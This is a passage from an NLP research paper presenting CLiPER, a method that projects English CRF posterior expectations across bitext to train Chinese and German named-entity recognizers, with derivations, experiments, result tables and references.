avoids the ex- pensive computation of a covariance matrix between features and constraints, whereas GE directly cal- culates the gradient. However, later results (Druck, 2011) have shown that using the Expectation Semir- ing techniques of Li and Eisner (2009), one can compute the exact gradients of GE in a Conditional Random Fields (CRF) (Lafferty et al., 2001) at costs 3This is a city in the state of Georgia in USA, famous for its golf courses. It is ambiguous since both Augusta and Georgia can also be used as person names. 4The different terminology employed by GE and PR may be confusing to discerning readers, but the “expectation” in the context of GE means the same thing as “marginal posterior” as in PR. 56 no greater than computing the gradients of ordinary CRF. And empirically, GE tends to perform more ac- curately than PR (Bellare et al., 2009; Druck, 2011). Obtaining appropriate knowledge resources for constructing constraints remain as a bottleneck in applying GE and PR to new languages. However, a number of past work recognizes parallel bitext as a rich source of linguistic constraints, naturally cap- tured in the translations. As a result, bitext has been effectively utilized for unsupervised multilin- gual grammar induction (Alshawi et al., 2000; Sny- der et al., 2009), parsing (Burkett and Klein, 2008), and sequence labeling (Naseem et al., 2009). A number of recent work also explored bilin- gual constraints in the context of simultaneous bilin- gual tagging, and showed that enforcing agreements between language pairs give superior results than monolingual tagging (Burkett et al., 2010; Che et al., 2013; Wang et al., 2013a). Burkett et al. (2010) also demonstrated a uptraining (Petrov et al., 2010) setting where tag-induced bitext can be used as ad- ditional monolingual training data to improve mono- lingual taggers. A major drawback of this approach is that it requires a readily-trained tagging models in each languages, which makes a weakly supervised setting infeasible. Another intricacy of this approach is that it only works when the two models have com- parable strength, since mutual agreements are en- forced between them. Projection-based methods can be very effective in weakly-supervised scenarios, as demonstrated by Yarowsky and Ngai (2001), and Xi and Hwa (2005). One problem with projected labels is that they are often too noisy to be directly used as training sig- nals. To mitigate this problem, Das and Petrov (2011) designed a label propagation method to au- tomatically induce a tag lexicon for the foreign lan- guage to smooth the projected labels. Fossum and Abney (2005) filter out projection noise by com- bining projections from from multiple source lan- guages. However, this approach is not always viable since it relies on having parallel bitext from multi- ple source languages. Li et al. (2012) proposed the use of crowd-sourced Wiktionary as additional re- sources for inducing tag lexicons. More recently, Täckström et al. (2013) combined token-level and type-level constraints to constrain legitimate label sequences and and recalibrate the probability distri- bution in a CRF. The tag dictionary used for POS tagging are analogous to the gazetteers and name lexicons used for NER by Chang et al. (2007). Our work is also closely related to Ganchev et al. (2009). They used a two-step projection method similar to Das and Petrov (2011) for dependency parsing. Instead of using the projected linguis- tic structures as ground truth (Yarowsky and Ngai, 2001), or as features in a generative model (Das and Petrov, 2011), they used them as constraints in a PR framework. Our work differs by project- ing expectations rather than Viterbi one-best labels. We also choose the GE framework over PR. Experi- ments in Bellare et al. (2009) and Druck (2011) sug- gest that in a discriminative model (like ours), GE is more accurate than PR. More recently, Ganchev and Das (2013) further extended this line of work to directly train discriminative sequence models us- ing cross lingual projection with PR. The types of constraints applied in this new work are similar to the ones in the monolingual PR setting proposed by Ganchev et al. (2010), where the total counts of la- bels of a particular kind are expected to match some fraction of the projected total counts. Our work dif- fer in that we enforce expectation constraints at to- ken level, which gives tighter guidance to learning the model. 3 Approach Given bitext between English and a foreign lan- guage, our goal is to learn a CRF model in the foreign language from little or no labeled data. Our method performs Cross-Lingual Projected Expectation Regularization (CLiPER). For every aligned sentence pair in the bitext, we first compute the posterior marginal at each word po- sition on the English side using a pre-trained English CRF tagger; then for each aligned English word, we project its posterior marginal as expectations to the aligned word position on the foreign side. Figure 1 shows a snippet of a sentence from real corpus. No- tice that if we were to directly project the Viterbi best assignment from English to Chinese, all three Chinese words that are named entities would have gotten the wrong tags. But projecting the English CRF model expectations preserves some uncertain- ties, informing the Chinese model that there is a 40% 57 a reception in Luobu Linka . . . . . . met with representatives of Zhongguo Ribao O:0.0032 O:0.0037 GPE:0.0000 GPE:0.0000PER:0.0000 PER:0.0000 PER:0.0000 GPE:0.0042 GPE:0.0042 LOC:0.0003 LOC:0.0003GPE:0.0000 GPE:0.0000 GPE:0.0000 ORG:0.0308 ORG:0.0307 O:0.0012 O:0.0011ORG:0.0000 ORG:0.0000 ORG:0.0000 LOC:0.3250 LOC:0.3256 ORG:0.4060 ORG:0.4061LOC:0.0000 LOC:0.0000 LOC:0.0000 PER:0.6369 PER:0.6377 PER:0.5925 PER:0.5925O:1.0000 O:1.0000 O:1.0000 在罗布林卡举行的招待会 . . . . . . 会见了中国日报代表 PER:0.6373 PER:0.5925 PER:0.5925O:1.0000 O:1.0000 O:1.0000 LOC:0.3253 ORG:0.4060 ORG:0.4061LOC:0.0000 LOC:0.0000 LOC:0.0000 ORG:0.0307 O:0.0012 O:0.0011ORG:0.0000 ORG:0.0000 ORG:0.0000 GPE:0.0042 LOC:0.0003 LOC:0.0003GPE:0.0000 GPE:0.0000 GPE:0.0000 O:0.0035 GPE:0.0000 GPE:0.0000PER:0.0000 PER:0.0000 PER:0.0000 Figure 1: Diagram illustrating the projection of model expectation from English to Chinese. The posterior probabilities assigned by the English CRF model is shown above each English word; automatically induced word alignments are shown in red; the correct projected labels for Chinese words are shown in green, and incorrect labels are shown in red. chance that “中国日报” (China Daily) is an organi- zation in this context. We would like to learn a CRF model in the for- eign language that has similar expectations as the projected expectations from English. To this end, we adopt the Generalized Expectation (GE) Crite- ria framework introduced by Mann and McCallum (2010). In the remainder of this section, we follow the notation used in (Druck, 2011) to explain our ap- proach. 3.1 CLiPER The general idea of GE is that we can express our preferences over models through constraint func- tions. A desired model should satisfy the imposed constraints by matching the expectations on these constraint functions with some target expectations (attained by external knowledge like lexicons or in our case transferred knowledge from English). We define a constraint function φi,lj for each word po- sition i and output label assignment lj. φi,lj = 0 is a constraint in that position i cannot take label lj. The set {l1, · · · , lm} denotes all possible label as- signment for each yi, and m is number of label val- ues. Ai is the set of English words aligned to Chi- nese word i. φi,lj are defined for all position i such that Ai 6= ∅. In other words, the constraint function applies only to Chinese word positions that have at least one aligned English word. Each φi,lj (y) can be treated as a Bernoulli random variable, and we concatenate the set of all φi,lj into a random vector φ(y), where φk = φi,lj if k = i∗m + j. We drop the (y) in φ for simplicity. The target expectation over φi,lj , denoted as φ̃i,lj , is the expectation of assigning label lj to English word Ai under the English conditional probability model. When multiple English words are aligned to the same foreign word, we average the expectations. The expectation over φ under a conditional prob- ability model P(y|x; θ) is denoted as EP(y|x;θ)[φ], and simplified as Eθ[φ] whenever it is unambigu- ous. The conditional probability model P(y|x; θ) in our case is defined as a standard linear-chain CRF:5 P(y|x; θ) = 1 Z(x; θ) exp ( n∑ i θf(x,yi,yi−1) ) where f is a set of feature functions; θ are the match- ing parameters to learn; n = |x|. The objective function to maximize in a standard CRF is the log probability over a collection of la- beled documents: LCRF (θ) = a′∑ a=1 log P(y∗a|xa; θ) (1) a′ is the number of labeled sentences. y∗ is an ob- served label sequence. The objective function to maximize in GE is de- fined as the sum over all unlabeled examples on the 5We simplify notation by dropping the L2 regularizer in the CRF definition, but apply it in our experiments. 58 foreign side of bitext, denoted as xb, over some cost function S between the model expectation over φ (Eθ[φ]) and the target expectation (φ̃). We choose S to be the negative L22 squared error sum6 defined as: LGE(θ) = n′∑ b=1 S ( EP(yb|xb;θ)[φ(yb)],φ̃b ) = n′∑ b=1 −‖φ̃b −Eθ[φ(yb)]‖22 (2) n′ is the total number of unlabeled bitext sentence pairs. When both labeled and bitext training data are available, the joint objective is the sum of Eqn. 1 and 2. Each is computed over the labeled training data and foreign half in the bitext, respectively. We can optimize this joint objective by comput- ing the gradients and use a gradient-based optimiza- tion method such as L-BFGS. Gradients of LCRF decomposes down to the gradients over each la- beled training example (x,y∗). Computing the gra- dient of LGE decomposes down to the gradients of S(EP(y|xb;θ[φ]) for each unlabeled foreign sentence x and the constraints over this example φ . The gra- dients can be calculated as: ∂ ∂θ S(Eθ[φ]) = − ∂ ∂θ ( φ̃−Eθ[φ] )T ( φ̃−Eθ[φ] ) = 2 ( φ̃−Eθ[φ] )T ( ∂ ∂θ Eθ[φ] ) We redefine the penalty vector u = 2 ( φ̃−Eθ[φ] ) to be u. ∂ ∂θ Eθ[φ] is a matrix where each column contains the gradients for a particular model feature θ with respect to all constraint functions φ. It can be 6In general, other loss functions such as KL-divergence can also be used for S. We found L22 to work well in practice. computed as: ∂ ∂θ Eθ[φ] = ∑ y φ(y) ∂ ∂θ P(y|x; θ) = ∑ y φ(y) ∂ ∂θ ( 1 Z(x; θ) exp(θT f(x,y)) ) = ∑ y φ(y) ( 1 Z(x; θ) ( ∂ ∂θ exp(θT f(x,y)) ) + exp(θT f(x,y)) ( ∂ ∂θ 1 Z(x; θ) )) = ∑ y φ(y) ( P(y|x; θ)f(x,y)T −P(y|x; θ) ∑ y′ P(y′|x; θ)f(x,y′)T ) = ∑ y P(y|x; θ) ∑ y φ(y)f(x,y)T − (∑ y P(y|x; θ)φ(y) )(∑ y P(y|x; θ)f(x,y)T ) = COVP(y|x;θ) (φ(y),f(x,y)) (3) = Eθ[φf T ]−Eθ[φ]Eθ[fT ] (4) Eqn. 3 gives the intuition of how optimization works in GE. In each iteration of L-BFGS, the model pa- rameters are updated according to their covariance with the constraint features, scaled by the differ- ence between current expectation and target expec- tation. The term Eθ[φfT ] in Eqn. 4 can be com- puted using a dynamic programming (DP) algo- rithm, but solving it directly requires us to store a matrix of the same dimension as fT in each step of the DP. We can reduce the complexity by using the same trick as in (Li and Eisner, 2009) for com- puting Expectation Semiring. The resulting algo- rithm has complexity O(nm2), which is the same as the standard forward-backward inference algorithm for CRF. (Druck, 2011, 93) gives full details of this derivation. 3.2 Hard vs. soft Projection Projecting expectations instead of one-best label as- signments from English to foreign language can be thought of as a soft version of the method de- scribed in (Das and Petrov, 2011) and (Ganchev et 59 al., 2009). Soft projection has its advantage: when the English model is not certain about its predic- tions, we do not have to commit to the current best prediction. The foreign model has more freedom to form its own belief since any marginal distribu- tion it produces would deviates from a flat distri- bution by just about the same amount. In general, preserving uncertainties till later is a strategy that has benefited many NLP tasks (Finkel et al., 2006). Hard projection can also be treated as a special case in our framework. We can simply recalibrate pos- terior marginal of English by assigning probability mass 1 to the most likely outcome, and zero ev- erything else out, effectively taking the argmax of the marginal at each word position. We refer to this version of expectation as the “hard” expecta- tion. In the hard projection setting, GE training re- sembles a “project-then-train” style semi-supervised CRF training scheme (Yarowsky and Ngai, 2001; Täckström et al., 2013). In such a training scheme, we project the one-best predictions of English CRF to the foreign side through word alignments, then in- clude the newly “tagged” foreign data as additional training data to a standard CRF in the foreign lan- guage. Rather than projecting labels on a per-word basis, Yarowsky and Ngai (2001) also explored an alternative method for noun-phrase (NP) bracketing task that amounts to projecting the spans of NPs based on the observation that individual NPs tend to retain their sequential spans across translations. We experimented with the same method for NER, but found that this method of projecting the NE spans does not help in reducing noise and actually lowers model performance. Besides the difference in projecting expecta- tions rather than hard labels, our method and the “project-then-train” scheme also differ by optimiz- ing different objectives: CRF optimizes maximum conditional likelihood of the observed label se- quence, whereas GE minimizes squared error be- tween model’s expectation and “hard” expectation based on the observed label sequence. In the case where squared error loss is replaced with a KL- divergence loss, GE has the same effect as marginal- izing out all positions with unknown projected la- bels, allowing more robust learning of uncertainties in the model. As we will show in the experimen- O PER LOC ORG GPE O 291339 391 141 1281 221 PER 1263 6721 5 56 73 LOC 409 23 546 123 133 ORG 2423 143 52 8387 196 GPE 566 239 69 668 6604 O PER LOC ORG MISC O 81209 24 38 155 103 PER 77 5725 41 69 10 LOC 49 40 3743 127 60 ORG 178 102 142 4075 91 MISC 175 41 30 114 1826 Table 1: Raw counts in the error confusion matrix of English CRF models. Top table contains the counts on OntoNotes test data, and bottom table contains CoNLL-03 test data counts. Rows are the true la- bels and columns are the observed labels. For exam- ple, item at row 2, column 3 of the top table reads: we observed 5 times where the true label should be PERSON, but English CRF model output label LO- CATION. tal results in Section 4.2, soft projection in combi- nation of the GE objective significantly outperforms the project-then-train style CRF training scheme. 3.3 Source-side noise An additional source of noise comes from errors generated by the source-side English CRF mod- els. We know that the English CRF models gives F1 score of 81.68% on the OntoNotes dataset for English-Chinese experiment, and 90.45% on the CoNLL-03 dataset for English-German experiment. We present a simple way of modeling English-side noise by picturing the following process: the la- bels assigned by the English CRF model (denoted as y) are some noised version of the true labels (de- noted as y∗). We can recover the probability of the true labels by marginalizing over the observed la- bels: P(y∗|x) = ∑ y P(y ∗|y)∗P(y|x). P(y|x) is the posterior probabilities given by the CRF model, and we can approximate P(y∗|y) by the column- normalized error confusion matrix shown in Table 1. This source-side noise model is likely to be overly simplistic. Generally speaking, we could build much more sophisticated noising model for the source- side, possibly conditioning on context, or capturing higher-order label sequences. 60 4 Experiments We conduct experiments on Chinese and German NER. We evaluate CLiPER in two learning set- tings: weakly supervised and semi-supervised. In the weakly supervised setting, we simulate the con- dition of having no labeled training data, and evalu- ate the model learned from bitext alone. We then vary the amount of labeled data available to the model, and examine the model’s learning curve. In the semi-supervised setting, we assume our model has access to the full labeled data; our goal is to improve performance of the supervised method by learning from additional bitext. 4.1 Dataset and setup We used the latest version of Stanford NER Toolkit7 as our base CRF model in all experiments. Fea- tures for English, Chinese and German CRFs are documented extensively in (Che et al., 2013) and (Faruqui and Padó, 2010) and omitted here for brevity. It it worth noting that the current Stan- ford NER models include recent improvements from semi-supervise learning approaches that induces dis- tributional similarity features from large word clus- ters. These models represent the current state-of- the-art in supervised methods, and serve as a very strong baseline. For Chinese NER experiments, we follow the same setup as Che et al. (2013) to evaluate on the latest OntoNotes (v4.0) corpus (Hovy et al., 2006).8 A total of 8,249 sentences from the parallel Chinese and English Penn Treebank portion 9 are reserved for evaluation. Odd-numbered documents are used as development set, and even-numbered documents are held out as blind test set. The rest of OntoNotes annotated with NER tags are used to train the En- glish and Chinese CRF base taggers. There are about 16k and 39k labeled sentences for Chinese and English training, respectively. The English CRF tag- ger trained on this training corpus gives F1 score of 81.68% on the OntoNotes test set. Four enti- ties types10 are used for both Chinese and English with a IO tagging scheme.11 The English-Chinese 7http://www-nlp.stanford.edu/ner 8LDC catalogue No.: LDC2011T03 9File numbers: chtb 0001-0325, ectb 1001-1078 10 PERSON, LOCATION, ORGANIZATION and GPE. 11We did not adopt the commonly seen BIO tagging scheme bitext comes from the Foreign Broadcast Informa- tion Service corpus (FBIS).12 We randomly sampled 80k parallel sentence pairs to use as bitext in our experiments. It is first sentence aligned using the Champollion Tool Kit,13 then word aligned with the BerkeleyAligner.14 For German NER experiments, we evaluate us- ing the standard CoNLL-03 NER corpus (Sang and Meulder, 2003). The labeled training set has 12k and 15k sentences, containing four entity types.15 An English CRF model is also trained on the CoNLL- 03 English data with the same entity types. For bi- text, we used a randomly sampled set of 40k parallel sentences from the de-en portion of the News Com- mentary dataset.16 The English CRF tagger trained on CoNLL-03 English training corpus gives F1 score of 90.4% on the CoNLL-03 test set. We report typed entity precision (P), recall (R) and F1 score. Statistical significance tests are done using a paired bootstrap resampling method with 1000 iterations, averaged over 5 runs. We com- pare against three recently approaches that were in- troduced in Section 2. They are: semi-supervised learning method using factored bilingual models with Gibbs sampling (Wang et al., 2013a); bilin- gual NER using Integer Linear Programming (ILP) with bilingual constraints, by (Che et al., 2013); and constraint-driven bilingual-reranking approach (Burkett et al., 2010). The code from (Che et al., 2013) and (Wang et al., 2013a) are publicly avail- able.17 Code from (Burkett et al., 2010) is obtained through personal communications. Since the objective function in Eqn. 2 is non- convex, we adopted the early stopping training scheme from (Turian et al., 2010) as the following: after each iteration in L-BFGS training, the model (Ramshaw and Marcus, 1999), because when projected across swapping word alignments, the “B-” and “I-” tag distinction may not be well-preserved and may introduce additional noise. 12The FBIS corpus is a collection of radio news casts and contains translations of openly available news and information from media sources outside the United States. The LDC cata- logue No. is LDC2003E14. 13champollion.sourceforge.net 14code.google.com/p/berkeleyaligner 15 PERSON, LOCATION, ORGANIZATION and MISCELLA- NEOUS. 16http://www.statmt.org/wmt13/ training-parallel-nc-v8.tgz 17https://github.com/stanfordnlp/CoreNLP 61 is evaluated against the development set; the train- ing procedure is terminated if no improvements have been made in 20 iterations. 4.2 Weakly supervised results Figure 2a and 2b show results of weakly supervised learning experiments. Quite remarkably, on Chinese test set, our proposed method (CLiPER) achieves a F1 score of 64.4% with 80k bitext, when no labeled training data is used. In contrast, the supervised CRF baseline would require as much as 12k labeled sentences to attain the same accuracy. Results on the German test set is less striking. With no labeled data and 40k of bitext, CLiPER performs at F1 of 60.0%, the equivalent of using 1.5k labeled examples in the supervised setting. When combined with 1k labeled examples, performance of CLiPER reaches 69%, a gain of over 5% absolute over supervised CRF. We also notice that supervised CRF model learns much faster in German than Chinese. This result is not too surprising, since it is well recognized that Chinese NER is more challenging than German or English. The best supervised results for Chinese is 10-20% (F1 score) behind best German and English super- vised results. Chinese NER relies more on lexical- ized features, and therefore needs more labeled data to achieve good coverage. The results suggest that CLiPER seems to be very effective at transferring lexical knowledge from English to Chinese. Figure 2c and 2d compares soft GE projection with hard GE projection and the “project-then-train” style CRF training scheme (cf. Section 3.2). We observe that both soft and hard GE projection sig- nificantly outperform the “project-then-train” style training scheme. The difference is especially pro- nounced on the Chinese results when fewer labeled examples are available. Soft projection gives better accuracy than hard projection when no labeled data is available, and also has a faster learning rate. Incorporating source-side noise using the method described in Section 3.3 gives a small improvement on Chinese with supervised data, increasing F1 score from 64.40% to 65.50%. This improvement is statis- tically significant at 92% confidence interval. How- ever, on the German data, we observe a tiny de- crease with no statistical significance in F1 score, dropping from 59.88% to 59.66%. A likely ex- planation of the difference is that the English CRF model in the English-Chinese experiment, which is trained on OntoNotes data, has a much higher error rate (18.32%) than the English CRF model in the English-German experiment trained on CoNLL-03 (9.55%). Therefore, modeling noise in the English- Chinese case is likely to have a greater effect than the English-German case. 4.3 Semi-supervised results In the semi-supervised experiments, we let the CRF model use the full set of labeled examples in addi- tion to the unlabeled bitext. Results on the test set are shown in Table 2. All semi-supervised baselines are tested with the same number of unlabeled bitext as CLiPER in each language. The “project-then- train” semi-supervised training scheme severely hurts performance on Chinese, but gives a small im- provement on German. Moreover, on Chinese it learns to achieve high precision but at a significant loss in recall. On German its behavior is the oppo- site. Such drastic and erratic imbalance suggest that this method is not robust or reliable. The other three semi-supervised baselines (row 3-5) all show im- provements over the CRF baseline, consistent with their reported results. CLIPERs gives the best re- sults on both Chinese and German, yielding statis- tically significant improvements over all baselines except for CWD13 on German. The hard projection version of CLiPER also gives sizable gain over CRF. However, in comparison, CLIPERs is superior. The improvements of CLIPERs over CRF on Chinese test set is over 2.8% in absolute F1. The improvement over CRF on German is almost a per- cent. To our knowledge, these are the best reported numbers on the OntoNotes Chinese and CoNLL-03 German datasets. 4.4 Efficiency Another advantage of our proposed approach is ef- ficiency. Because we eliminated the previous multi- stage “uptraining” paradigm, but instead integrating the semi-supervised and supervised objective into one joint objective, we are able to attain signifi- cant speed improvements over all methods except CRFptt. Table 3 shows the required training time. 62 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 0 10 20 30 40 50 60 70 80 # of labeled training sentences [k] F 1 sc or e [% ] supervised CRF CLiPPER soft (a) Chinese Test 0 1 2 3 4 5 6 7 8 9 10 11 12 0 10 20 30 40 50 60 70 80 # of labeled training sentences [k] F 1 sc or e [% ] supervised CRF CLiPPER soft (b) German Test 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 44 46 48 50 52 54 56 58 60 62 64 66 68 70 72 74 76 # of labeled training sentences [k] F 1 sc or e [% ] CRF projection CLiPPER hard CLiPPER soft (c) Soft vs. Hard on Chinese Test 0 1 2 3 4 5 6 7 8 9 10 11 12 54 56 58 60 62 64 66 68 70 72 74 76 78 80 # of labeled training sentences [k] F 1 sc or e [% ] CRF projection CLiPPER hard CLiPPER soft (d) Soft vs. Hard on German Test [高岗] 纪念碑在 [横山] 落成 A monument commemorating [Vice President Gao GangPER ] was completed in [HengshanLOC ] (e) Word proceeding “monument” is PERSON [碛口] [毛主席] 东渡 [黄河] 纪念碑简介 Introduction of [QikouLOC ] [Chairman MaoPER ] [Yellow RiverLOC ] crossing monument (f) Word proceeding “monument” is LOCATION Figure 2: Top four figures show performance curves of CLiPER with varying amounts of available labeled training data in a weakly supervised setting. Vertical axes show the F1 score on the test set. Performance curves of supervised CRF and “project-then-train” CRF are plotted for comparison. Bottom two figures are examples of aligned sentence pairs in Chinese and English. 63 Chinese German P R F1 P R F1 CRF 79.09 63.59 70.50 86.69 71.30 78.25 CRFptt 84.01 45.29 58.85 81.50 75.56 78.41 BPBK10 79.25 65.67 71.83 84.00 72.17 77.64 CWD13 81.31 65.50 72.55 85.99 72.98 78.95 WCD13a 80.31 65.78 72.33 85.98 72.37 78.59 WCD13b 78.55 66.54 72.05 85.19 72.98 78.62 CLiPERh 83.67 64.80 73.04§‡ 86.52 72.02 78.61∗ CLiPERs 82.57 65.99 73.35 §†? �∗ 87.11 72.56 79.17 ‡? ∗§ Table 2: Test set Chinese, German NER results. Best number of each column is highlighted in bold. CRF is the supervised baseline. CRFptt is the “project-then-train” semi-supervised scheme for CRF. BPBK10 is (Burkett et al., 2010), WCD13 is (Wang et al., 2013a), CWD13A is (Che et al., 2013), and WCD13B is (Wang et al., 2013b) . CLIPERs and CLIPERh are the soft and hard projections. § indicates F1 scores that are statistically significantly better than CRF baseline at 99.5% confidence level; ? marks significance over CRFptt with 99.5% con- fidence; † and ‡ marks significance over WCD13 with 99.9% and 94% confidence; and � marks sig- nificance over CWD13 with 99.7% confidence; ∗ marks significance over BPBK10 with 99.9% con- fidence. 5 Discussions Figure 2e and 2f give two examples of cross-lingual projection methods in action. Both examples have a named entity that immediately proceeds the word “纪念碑” (monument) in the Chinese sentence. In Figure 2e, the word “高岗” has literal meaning of a hillock located at a high position, which also hap- pens to be the name of a former vice president of China. Without having previously observed this word as a person name in the labeled training data, the CRF model does not have enough evidence to believe that this is a PERSON, instead of LOCATION. But the aligned words in English (“Gao Gang”) are clearly part of a person name as they were pre- ceded by a title (“Vice President”). The English model has high expectation that the aligned Chi- nese word of ”Gao Gang” is also a PERSON. There- fore, projecting the English expectations to Chinese provides a strong clue to help disambiguating this word. Figure 2f gives another example: the word “黄河”(Huang He, the Yellow River of China) can Chinese German CRF 19m30s 7m15s CRFptt 34m2s 12m45s WCD13 3h17m 1h1m CWD13a 16h42m 4h49m CWD13b 16h42m 4h49m BPBK10 6h16m 2h42m CLiPERh 1h28m 16m30s CLiPERs 1h40m 18m51s Table 3: Timing stats during model training. be confused with a person name since “黄”(Huang or Hwang) is also a common Chinese last name.18. Again, knowing the translation in English, which has the indicative word “River” in it, helps disam- biguation. The CRFptt and CLIPERh methods successfully labeled these two examples correctly, but failed to produce the correct label for the example in Fig- ure 1. On the other hand, a model trained with the CLIPERs method does correctly label both entities in Figure 1, demonstrating the merits of the soft pro- jection method. 6 Conclusion We introduced a domain and language independent semi-supervised method for training discriminative models by projecting expectations across bitext. Ex- periments on Chinese and German NER show that our method, learned over bitext alone, can rival per- formance of supervised models trained with thou- sands of labeled examples. Furthermore, applying our method in a setting where all labeled examples are available also shows improvements over state-of- the-art supervised methods. Our experiments also showed that soft expectation projection is more fa- vorable to hard projection. This technique can be generalized to all sequence labeling tasks, and can be extended to include more complex constraints. For future work, we plan to apply this method to more language pairs and also explore data selection strategies and modeling alignment uncertainties. 18In fact, a people search of the name 黄河 on the most pop- ular Chinese social network (renren.com) returns over 13,000 matches. 64 Acknowledgments The authors would like to thank Jennifer Gillenwa- ter for a discussion that inspired this work, Behrang Mohit and Nathan Schneider for their help with the Arabic NER data, and David Burkett for providing the source code of their work for comparison. We would also like to thank editor Lillian Lee and the three anonymous reviewers for their valuable com- ments and suggestions. We gratefully acknowledge the support of the U.S. Defense Advanced Research Projects Agency (DARPA) Broad Operational Lan- guage Translation (BOLT) program through IBM. Any opinions, findings, and conclusion or recom- mendations expressed in this material are those of the authors and do not necessarily reflect the view of DARPA, or the US government. References Hiyan Alshawi, Srinivas Bangalore, and Shona Douglas. 2000. Head-transducer models for speech translation and their automatic acquisition from bilingual data. Machine Translation, 15. Rie Kubota Ando and Tong Zhang. 2005. A high- performance semi-supervised learning method for text chunking. In Proceedings of ACL. Kedar Bellare, Gregory Druck, and Andrew McCallum. 2009. Alternating projections for learning with expec- tation constraints. In Proceedings of UAI. Avrim Blum and Tom Mitchell. 1998. Combining la- beled and unlabeled data with co-training. In Proceed- ings of COLT. David Burkett and Dan Klein. 2008. Two languages are better than one (for syntactic parsing). In Proceedings of EMNLP. David Burkett, Slav Petrov, John Blitzer, and Dan Klein. 2010. Learning better monolingual models with unan- notated bilingual text. In Proceedings of CoNLL. Andrew Carlson, Justin Betteridge, Richard C. Wang, Es- tevam R. Hruschka Jr., and Tom M. Mitchell. 2010. Coupled semi-supervised learning for information ex- traction. In Proceedings of WSDM. Ming-Wei Chang, Lev Ratinov, and Dan Roth. 2007. Guiding semi-supervision with constraint- driven learning. In Proceedings of ACL. Wanxiang Che, Mengqiu Wang, and Christopher D. Man- ning. 2013. Named entity recognition with bilingual constraints. In Proceedings of NAACL. Michael Collins and Yoram Singer. 1999. Unsupervised models for named entity classification. In Proceedings of EMNLP. Dipanjan Das and Slav Petrov. 2011. Unsupervised part- of-speech tagging with bilingual graph-based projec- tions. In Proceedings of ACL. Gregory Druck and Andrew McCallum. 2010. High- performance semi-supervised learning using discrim- inatively constrained generative models. In Proceed- ings of ICML. Gregory Druck, Gideon Mann, and Andrew McCallum. 2007. Leveraging existing resources using generalized expectation criteria. In Proceedings of NIPS Workshop on Learning Problem Design. Gregory Druck, Burr Settles, and Andrew McCallum. 2009. Active learning by labeling features. In Pro- ceedings of EMNLP. Gregory Druck. 2011. Generalized Expectation Criteria for Lightly Supervised Learning. Ph.D. thesis, Univer- sity of Massachusetts Amherst. Manaal Faruqui and Sebastian Padó. 2010. Training and evaluating a German named entity recognizer with se- mantic generalization. In Proceedings of KONVENS. Jenny Rose Finkel, Christopher D. Manning, and An- drew Y. Ng. 2006. Solving the problem of cascading errors: Approximate bayesian inference for linguistic annotation pipelines. In Proceedings of EMNLP. Victoria Fossum and Steven Abney. 2005. Automatically inducing a part-of-speech tagger by projecting from multiple source languages across aligned corpora. In Proceedings of IJCNLP. Kuzman Ganchev and Dipanjan Das. 2013. Cross- lingual discriminative learning of sequence models with posterior regularization. In Proceedings of EMNLP. Kuzman Ganchev, Jennifer Gillenwater, and Ben Taskar. 2009. Dependency grammar induction via bitext pro- jection constraints. In Proceedings of ACL. Kuzman Ganchev, Jo ao Graça, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. JMLR, 10:2001–2049. Andrew B. Goldberg. 2010. New Directions in Semi- supervised Learning. Ph.D. thesis, University of Wisconsin-Madison. Eduard Hovy, Mitchell Marcus, Martha Palmer, Lance Ramshaw, and Ralph Weischedel. 2006. OntoNotes: the 90% solution. In Proceedings of NAACL-HLT. Dan Klein. 2005. The Unsupervised Learning of Natural Language Structure. Ph.D. thesis, Stanford Univer- sity. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional random fields: Probabilis- tic models for segmenting and labeling sequence data. In Proceedings of ICML. 65 Zhifei Li and Jason Eisner. 2009. First- and second-order expectation semirings with applications to minimum- risk training on translation forests. In Proceedings of EMNLP. Shen Li, Jo ao Graça, and Ben Taskar. 2012. Wiki-ly supervised part-of-speech tagging. In Proceedings of EMNLP-CoNLL. Percy Liang. 2005. Semi-supervised learning for natural language. Master’s thesis, Massachusetts Institute of Technology. Gideon Mann and Andrew McCallum. 2010. General- ized expectation criteria for semi-supervised learning with weakly labeled data. JMLR, 11:955–984. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Effective self-training for parsing. In Proceed- ings of NAACL-HLT. Tahira Naseem, Benjamin Snyder, Jacob Eisenstein, and Regina Barzilay. 2009. Multilingual part-of- speech tagging: Two unsupervised approaches. JAIR, 36:1076–9757. Slav Petrov, Pi-Chuan Chang, Michael Ringgaard, and Hiyan Alshawi. 2010. Uptraining for accurate deter- ministic question parsing. In Proceedings of EMNLP. Lance A. Ramshaw and Mitchell P. Marcus. 1999. Text chunking using transformation-based learning. Natu- ral Language Processing Using Very Large Corpora, 11:157–176. Rajhans Samdani, Ming-Wei Chang, and Dan Roth. 2012. Unified expectation maximization. In Proceed- ings of NAACL. Erik F. Tjong Kim Sang and Fien De Meulder. 2003. In- troduction to the CoNLL-2003 shared task: language- independent named entity recognition. In Proceedings of CoNLL. Vikas Sindhwani, Partha Niyogi, and Mikhail Belkin. 2005. A co-regularization approach to semi- supervised learning with multiple views. In Proceed- ings of ICML Workshop on Learning with Multiple Views, International Conference on Machine Learn- ing. Noah A. Smith. 2006. Novel Estimation Methods for Unsupervised Discovery of Latent Structure in Natu- ral Language Text. Ph.D. thesis, Johns Hopkins Uni- versity. Benjamin Snyder, Tahira Naseem, and Regina Barzilay. 2009. Unsupervised multilingual grammar induction. In Proceedings of ACL. Jun Suzuki and Hideki Isozaki. 2008. Semi-supervised sequential labeling and segmentation using giga-word scale unlabeled data. In Proceedings of ACL. Oscar Täckström, Dipanjan Das, Slav Petrov, Ryan Mc- Donald, and Joakim Nivre. 2013. Token and type constraints for cross-lingual part-of-speech tagging. In Proceedings of ACL. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: A simple and general method for semi-supervised learning. In Proceedings of ACL. Mengqiu Wang, Wanxiang Che, and Christopher D. Man- ning. 2013a. Effective bilingual constraints for semi- supervised learning of named entity recognizers. In Proceedings of AAAI. Mengqiu Wang, Wanxiang Che, and Christopher D. Man- ning. 2013b. Joint word alignment and bilingual named entity recognition using dual decomposition. In Proceedings of ACL. Chenhai Xi and Rebecca Hwa. 2005. A backoff model for bootstrapping resources for non-english languages. In Proceedings of HLT-EMNLP. David Yarowsky and Grace Ngai. 2001. Inducing mul- tilingual POS taggers and NP bracketers via robust projection across aligned corpora. In Proceedings of NAACL. David Yarowsky. 1995. Unsupervised word sense dis- 